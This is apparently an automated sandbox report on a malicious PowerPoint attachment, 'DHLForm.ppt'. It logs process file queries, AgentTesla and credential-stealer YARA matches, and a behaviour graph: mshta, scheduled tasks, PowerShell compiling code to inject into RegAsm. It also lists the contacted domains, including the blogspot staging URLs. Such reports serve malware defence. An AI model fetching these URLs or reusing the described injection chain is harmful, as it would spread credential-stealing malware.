Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\SysWOW64\Macromed\Flash\activex.vch VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 40.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f3f158.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5317148.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5317148.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f67190.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5f60990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f67190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5f60990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000032.00000002.462560709.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.506840923.000001ACC5317000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.513533117.000001ACC5DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.461913148.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.503899731.000001ACC4DAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.491008866.000001ACB6897000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000002.474315568.0000000003441000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.467392161.0000000003111000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7044, type: MEMORYSTR
Yara detected Credential Stealer
Source: Yara match File source: 00000032.00000002.474315568.0000000003441000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.467392161.0000000003111000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 40.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f3f158.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5317148.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5317148.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f67190.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5f60990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f67190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5f60990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000032.00000002.462560709.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.506840923.000001ACC5317000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.513533117.000001ACC5DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.461913148.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.503899731.000001ACC4DAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.491008866.000001ACB6897000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000002.474315568.0000000003441000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.467392161.0000000003111000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7044, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 483878 Sample: DHLForm.ppt Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 101 Multi AV Scanner detection for submitted file 2->101 103 Yara detected AgentTesla 2->103 105 Yara detected AntiVM3 2->105 107 6 other signatures 2->107 9 cmd.exe 4 2 2->9         started        11 powershell.exe 2->11         started        16 mshta.exe 2->16         started        18 8 other processes 2->18 process3 dnsIp4 20 POWERPNT.EXE 158 31 9->20         started        23 conhost.exe 9->23         started        87 bitbucket.org 104.192.141.1, 443, 49778, 49786 AMAZON-02US United States 11->87 89 192.168.2.1 unknown unknown 11->89 73 C:\Users\user\AppData\...\lmts0v03.cmdline, UTF-8 11->73 dropped 129 Writes to foreign memory regions 11->129 131 Compiles code for process injection (via .Net compiler) 11->131 133 Injects a PE file into a foreign processes 11->133 25 RegAsm.exe 11->25         started        28 csc.exe 11->28         started        30 conhost.exe 11->30         started        32 RegAsm.exe 11->32         started        91 www.google.com 16->91 97 6 other IPs or domains 16->97 135 Writes or reads registry keys via WMI 16->135 137 Writes registry values via WMI 16->137 34 powershell.exe 16->34         started        93 www.google.com 18->93 95 www.google.com 18->95 99 39 other IPs or domains 18->99 37 conhost.exe 18->37         started        file5 signatures6 process7 dnsIp8 65 C:\Users\user\Desktop\~$DHLForm.ppt, data 20->65 dropped 67 C:\Users\user\AppData\...\DHLForm.ppt.LNK, MS 20->67 dropped 39 mshta.exe 2 56 20->39         started        121 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 25->121 123 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 25->123 69 C:\Users\user\AppData\Local\...\lmts0v03.dll, PE32 28->69 dropped 43 cvtres.exe 28->43         started        77 bitbucket.org 34->77 71 C:\Users\user\AppData\Local\...\dtsgyyde.0.cs, C++ 34->71 dropped 125 Writes to foreign memory regions 34->125 127 Injects a PE file into a foreign processes 34->127 45 csc.exe 34->45         started        48 conhost.exe 34->48         started        file9 signatures10 process11 dnsIp12 81 gstaticadssl.l.google.com 142.250.186.35, 443, 49765, 49768 GOOGLEUS United States 39->81 83 www-google-analytics.l.google.com 142.250.203.110, 443, 49758, 49777 GOOGLEUS United States 39->83 85 8 other IPs or domains 39->85 113 Uses schtasks.exe or at.exe to add and modify task schedules 39->113 115 Creates a scheduled task launching mshta.exe (likely to bypass HIPS) 39->115 117 Writes or reads registry keys via WMI 39->117 119 Writes registry values via WMI 39->119 50 powershell.exe 15 23 39->50         started        55 schtasks.exe 39->55         started        75 C:\Users\user\AppData\Local\...\a0uccovc.dll, PE32 45->75 dropped 57 cvtres.exe 45->57         started        file13 signatures14 process15 dnsIp16 79 bitbucket.org 50->79 63 C:\Users\user\AppData\Local\...\uz5edm2y.0.cs, C++ 50->63 dropped 109 Compiles code for process injection (via .Net compiler) 50->109 111 Injects a PE file into a foreign processes 50->111 59 conhost.exe 50->59         started        61 conhost.exe 55->61         started        file17 signatures18 process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.217.168.13
 accounts.google.com United States
15169 GOOGLEUS false
142.250.186.35
 gstaticadssl.l.google.com United States
15169 GOOGLEUS false
172.217.168.36
 www.google.com United States
15169 GOOGLEUS false
104.192.141.1
 bitbucket.org United States
16509 AMAZON-02US false
216.58.215.225
 blogspot.l.googleusercontent.com United States
15169 GOOGLEUS false
216.58.215.233
 blogger.l.google.com United States
15169 GOOGLEUS false
142.250.203.110
 www-google-analytics.l.google.com United States
15169 GOOGLEUS false
67.199.248.15
 bitly.com United States
396982 GOOGLE-PRIVATE-CLOUDUS false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
gstaticadssl.l.google.com 142.250.186.35 true
bitbucket.org 104.192.141.1 true
accounts.google.com 172.217.168.13 true
www-google-analytics.l.google.com 142.250.203.110 true
bitly.com 67.199.248.15 true
blogspot.l.googleusercontent.com 216.58.215.225 true
www.google.com 172.217.168.36 true
blogger.l.google.com 216.58.215.233 true
ghostbackbone123.blogspot.com unknown unknown
startthepartyup.blogspot.com unknown unknown
backbones1234511a.blogspot.com unknown unknown
randikhanaekminar.blogspot.com unknown unknown
johonathahogyaabagebarhomeintum.blogspot.com unknown unknown
www.blogger.com unknown unknown
resources.blogblog.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.blogger.com/blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog false
    		high
    https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true false
      		high
      https://www.google.com/css/maia.css false
        		high
        http://randikhanaekminar.blogspot.com/p/ayoola.html false
          		high
          https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.css false
            		high
            https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 false
              		high
              https://backbones1234511a.blogspot.com/p/ayoolaback.html%22 false
                		high
                http://backbones1234511a.blogspot.com/p/ayoolaback.html%22 false
                  		high